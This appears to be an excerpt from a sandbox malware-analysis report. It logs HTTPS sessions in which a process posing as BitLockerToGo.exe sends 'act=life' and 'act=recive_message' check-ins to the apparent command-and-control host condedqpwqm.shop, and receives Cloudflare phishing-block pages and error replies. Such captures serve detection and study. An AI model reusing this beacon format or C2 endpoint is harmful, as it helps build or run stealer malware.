2024-09-04 15:37:44 UTC	824	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-04 15:37:44 UTC	1369	IN	Data Raw: 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 Data Ascii: ors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-ale
2024-09-04 15:37:44 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 47 71 53 53 6c 6b 70 74 57 54 6d 76 79 4a 4f 32 68 78 69 30 62 6c 6c 38 71 69 7a 65 6c 71 55 65 4a 4c 75 5a 4b 5a 5f 79 49 32 30 2d 31 37 32 35 34 36 34 32 36 34 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 Data Ascii: <input type="hidden" name="atok" value="GqSSlkptWTmvyJO2hxi0bll8qizelqUeJLuZKZ_yI20-1725464264-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="b
2024-09-04 15:37:44 UTC	843	IN	Data Raw: 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 Data Ascii: en">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></spa
2024-09-04 15:37:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	53038	172.67.146.35	443	5352	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:45 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condedqpwqm.shop
2024-09-04 15:37:45 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-04 15:37:45 UTC	549	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c62r3M04nFYlMi13nixJgLcTRdfYvHdybyr3KJ0wHX%2FkEIvLibvtC%2B3kWEIQWZD1mCtaUsaInEKfrg71JfzSOIQ4hFfDU6cd35af8gLZKEVqCU%2BaZbueO0F0yda%2FOwc4Q%2BrN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf100ccc1b5e5f-EWR
2024-09-04 15:37:45 UTC	820	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-04 15:37:45 UTC	1369	IN	Data Raw: 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 Data Ascii: .errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie
2024-09-04 15:37:45 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 55 2e 6e 58 30 49 53 33 6f 4a 37 30 42 6e 42 35 4f 4d 44 43 71 5f 54 61 6e 42 30 31 78 68 38 6b 38 47 45 7a 4e 74 31 6c 70 39 6f 2d 31 37 32 35 34 36 34 32 36 35 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c Data Ascii: <input type="hidden" name="atok" value="U.nX0IS3oJ70BnB5OMDCq_TanB01xh8k8GEzNt1lp9o-1725464265-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" styl
2024-09-04 15:37:45 UTC	847	IN	Data Raw: 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c Data Ascii: hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a><
2024-09-04 15:37:45 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	53039	172.67.146.35	443	6828	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:45 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=GqSSlkptWTmvyJO2hxi0bll8qizelqUeJLuZKZ_yI20-1725464264-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: condedqpwqm.shop
2024-09-04 15:37:45 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 45 36 55 48 4e 52 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=E6UHNR--&j=
2024-09-04 15:37:46 UTC	798	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qp4b42elp0696bktc04eeb0o0k; expires=Sun, 29 Dec 2024 09:24:24 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OeQh61MIv5UV%2FccFC5cSN3sE0O1QOxQk3ghCf3nxkUm08y83tpFuKoAs%2FBoBS9oKiAJWaq0Iq5p57aoBTPQCFPJsU84hEeoI9AZcecHozNGdI5jIAXH536%2F4A8%2FpoPZsuvlx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf100d39c40ca1-EWR alt-svc: h3=":443"; ma=86400
2024-09-04 15:37:46 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-04 15:37:46 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	53041	172.67.146.35	443	5352	C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:50 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=U.nX0IS3oJ70BnB5OMDCq_TanB01xh8k8GEzNt1lp9o-1725464265-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: condedqpwqm.shop
2024-09-04 15:37:50 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 61 38 6b 61 66 6d 2d 2d 40 63 6c 6f 75 64 63 6f 73 6d 69 63 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=a8kafm--@cloudcosmic&j=
2024-09-04 15:37:50 UTC	800	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ir5qehqbb668bunmve8a4ostdb; expires=Sun, 29 Dec 2024 09:24:29 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alPnLZPdUfuT9TnW0X0GTmQi%2Bp7yDJHdZJP7Tr7oHBQDIAn7i%2FKJ1RiQYNlO7MDkoN0f%2F3aSK%2BV0C1VshgTqn%2FaK5yTLuSeuP3DKVtlzu4QdMPeYQbpQ1ssX2Nj14OUsZ2K4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf102aec817ca5-EWR alt-svc: h3=":443"; ma=86400
2024-09-04 15:37:50 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-04 15:37:50 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
10	192.168.2.6	53044	172.67.146.35	443

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:55 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condedqpwqm.shop
2024-09-04 15:37:55 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-04 15:37:55 UTC	541	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HeXnkm3AENs9jfEmA2peLD2c%2BylWuXUdlzJG4b8SdjstnJGHpG2ZI2Unb8dMFH56vmEplAsYtpxjTAZNXyylxPfxZ8MxZ4EJXNKZES1ZZ0DCITXGJN0A1cAXFp3VDNoAPqcv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf1047bb23c466-EWR
2024-09-04 15:37:55 UTC	828	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-09-04 15:37:55 UTC	1369	IN	Data Raw: 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 27 29 Data Ascii: ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('cookie-alert')
2024-09-04 15:37:55 UTC	1369	IN	Data Raw: 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 6a 6e 63 73 33 6b 47 67 56 31 63 6e 6e 76 7a 5f 7a 2e 72 61 44 59 62 64 4a 66 41 6b 6b 61 50 62 76 74 31 68 65 5f 67 47 75 54 6f 2d 31 37 32 35 34 36 34 32 37 35 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 Data Ascii: <input type="hidden" name="atok" value="jncs3kGgV1cnnvz_z.raDYbdJfAkkaPbvt1he_gGuTo-1725464275-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="backg
2024-09-04 15:37:55 UTC	839	IN	Data Raw: 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 61 3e 3c 2f 73 70 61 6e 3e 0a 20 Data Ascii: •</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare</a></span>
2024-09-04 15:37:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
11	192.168.2.6	53045	172.67.146.35	443

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:37:57 UTC	353	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=jncs3kGgV1cnnvz_z.raDYbdJfAkkaPbvt1he_gGuTo-1725464275-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 42 Host: condedqpwqm.shop
2024-09-04 15:37:57 UTC	42	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--&j=
2024-09-04 15:37:57 UTC	796	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:37:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=49jnv3gqtksrbf4nhqg0mavjg2; expires=Sun, 29 Dec 2024 09:24:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2cXm784vY%2Bfcz2L3stvhUZIISnKWfOqqFSKMQ4zddfdcGAW2BidBs60wh%2BrTRhtVKUvLkU20nAs9ynSG5r4MucG70r2tNpOa3N8RhLbB2cjvCXHRRZyai%2B5HR7Ixn3OhtsPB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf10545ae07cab-EWR alt-svc: h3=":443"; ma=86400
2024-09-04 15:37:57 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-04 15:37:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	53052	172.67.146.35	443

Timestamp	Bytes transferred	Direction	Data
2024-09-04 15:38:24 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: condedqpwqm.shop
2024-09-04 15:38:24 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-04 15:38:24 UTC	553	IN	HTTP/1.1 200 OK Date: Wed, 04 Sep 2024 15:38:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V%2BmGMXZ8qFdQ0UhgZaJOshd2OFAt%2BqN7SFHMprBMC77wSsxJ2XxM16fitZTyqxQHZcxOajaS%2BDDO9XU5%2FGH2I%2Fs1nmavgNKurvxklTv%2BsZ%2Fyb8ijtq5to8V5WhpfNPekHxvh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bdf10fe2c078c0c-EWR
